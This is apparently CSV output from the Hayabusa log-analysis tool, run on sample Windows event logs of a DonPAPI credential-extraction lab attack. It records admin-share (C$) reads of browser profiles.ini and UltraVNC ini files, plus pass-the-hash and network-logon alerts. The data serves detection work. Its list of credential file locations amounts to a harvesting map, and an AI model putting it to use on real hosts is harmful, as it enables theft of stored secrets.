0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:03.986 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.002 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 
16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.017 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
